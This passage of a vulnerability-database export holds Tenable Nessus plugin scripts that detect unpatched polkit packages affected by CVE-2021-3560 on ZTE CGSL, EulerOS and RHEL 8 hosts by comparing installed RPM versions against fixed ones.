available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'polkit-0.115-11.el8_4.1',\n 'polkit-debuginfo-0.115-11.el8_4.1',\n 'polkit-debugsource-0.115-11.el8_4.1',\n 'polkit-devel-0.115-11.el8_4.1',\n 'polkit-docs-0.115-11.el8_4.1',\n 'polkit-libs-0.115-11.el8_4.1',\n 'polkit-libs-debuginfo-0.115-11.el8_4.1'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:09:29", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-11-17T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.0 : polkit (EulerOS-SA-2021-2765)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:2.9.0"], "id": "EULEROS_SA-2021-2765.NASL", "href": "https://www.tenable.com/plugins/nessus/155507", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155507);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 2.9.0 : polkit (EulerOS-SA-2021-2765)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2765\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953e6b35\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "RHEL 8 : polkit (RHSA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_aus:8.6", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_e4s:8.6", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_eus:8.6", "cpe:/o:redhat:rhel_tus:8.4", "cpe:/o:redhat:rhel_tus:8.6", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-devel", "p-cpe:/a:redhat:enterprise_linux:polkit-docs", "p-cpe:/a:redhat:enterprise_linux:polkit-libs"], "id": "REDHAT-RHSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150293", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2238. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150293);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : polkit (RHSA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2238\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.4/x86_64/appstream/debug',\n 'content/aus/rhel8/8.4/x86_64/appstream/os',\n 'content/aus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.4/x86_64/baseos/debug',\n 'content/aus/rhel8/8.4/x86_64/baseos/os',\n 'content/aus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/aarch64/appstream/debug',\n 'content/e4s/rhel8/8.4/aarch64/appstream/os',\n 'content/e4s/rhel8/8.4/aarch64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/aarch64/baseos/debug',\n 'content/e4s/rhel8/8.4/aarch64/baseos/os',\n 'content/e4s/rhel8/8.4/aarch64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.4/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.4/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.4/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.4/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.4/ppc64le/sap/os',\n 'content/e4s/rhel8/8.4/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.4/s390x/appstream/debug',\n 'content/e4s/rhel8/8.4/s390x/appstream/os',\n 'content/e4s/rhel8/8.4/s390x/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/s390x/baseos/debug',\n 'content/e4s/rhel8/8.4/s390x/baseos/os',\n 'content/e4s/rhel8/8.4/s390x/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.4/x86_64/appstream/os',\n 'content/e4s/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.4/x86_64/baseos/os',\n 'content/e4s/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/nfv/debug',\n 'content/e4s/rhel8/8.4/x86_64/nfv/os',\n 'content/e4s/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap/os',\n 'content/e4s/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/appstream/debug',\n 'content/eus/rhel8/8.4/aarch64/appstream/os',\n 'content/eus/rhel8/8.4/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/baseos/debug',\n 'content/eus/rhel8/8.4/aarch64/baseos/os',\n 'content/eus/rhel8/8.4/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.4/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.4/aarch64/highavailability/os',\n 'content/eus/rhel8/8.4/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.4/aarch64/supplementary/os',\n 'content/eus/rhel8/8.4/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.4/ppc64le/appstream/os',\n 'content/eus/rhel8/8.4/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.4/ppc64le/baseos/os',\n 'content/eus/rhel8/8.4/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.4/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.4/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.4/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.4/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/sap/debug',\n 'content/eus/rhel8/8.4/ppc64le/sap/os',\n 'content/eus/rhel8/8.4/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.4/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/appstream/debug',\n 'content/eus/rhel8/8.4/s390x/appstream/os',\n 'content/eus/rhel8/8.4/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/baseos/debug',\n 'content/eus/rhel8/8.4/s390x/baseos/os',\n 'content/eus/rhel8/8.4/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.4/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/highavailability/debug',\n 'content/eus/rhel8/8.4/s390x/highavailability/os',\n 'content/eus/rhel8/8.4/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.4/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/sap/debug',\n 'content/eus/rhel8/8.4/s390x/sap/os',\n 'content/eus/rhel8/8.4/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/s390x/supplementary/debug',\n 'content/eus/rhel8/8.4/s390x/supplementary/os',\n 'content/eus/rhel8/8.4/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/appstream/debug',\n 'content/eus/rhel8/8.4/x86_64/appstream/os',\n 'content/eus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/baseos/debug',\n 'content/eus/rhel8/8.4/x86_64/baseos/os',\n 'content/eus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.4/x86_64/highavailability/os',\n 'content/eus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap/debug',\n 'content/eus/rhel8/8.4/x86_64/sap/os',\n 'content/eus/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.4/x86_64/supplementary/os',\n 'content/eus/rhel8/8.4/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/appstream/debug',\n 'content/tus/rhel8/8.4/x86_64/appstream/os',\n 'content/tus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/baseos/debug',\n 'content/tus/rhel8/8.4/x86_64/baseos/os',\n 'content/tus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.4/x86_64/highavailability/os',\n 'content/tus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/nfv/debug',\n 'content/tus/rhel8/8.4/x86_64/nfv/os',\n 'content/tus/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/rt/debug',\n 'content/tus/rhel8/8.4/x86_64/rt/os',\n 'content/tus/rhel8/8.4/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.6/x86_64/appstream/debug',\n 'content/aus/rhel8/8.6/x86_64/appstream/os',\n 'content/aus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.6/x86_64/baseos/debug',\n 'content/aus/rhel8/8.6/x86_64/baseos/os',\n 'content/aus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.6/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.6/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.6/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.6/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.6/ppc64le/sap/os',\n 'content/e4s/rhel8/8.6/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.6/x86_64/appstream/os',\n 'content/e4s/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.6/x86_64/baseos/os',\n 'content/e4s/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap/os',\n 'content/e4s/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/appstream/debug',\n 'content/eus/rhel8/8.6/aarch64/appstream/os',\n 'content/eus/rhel8/8.6/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/baseos/debug',\n 'content/eus/rhel8/8.6/aarch64/baseos/os',\n 'content/eus/rhel8/8.6/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.6/aarch64/codeready-builder/source/SRPMS',\n 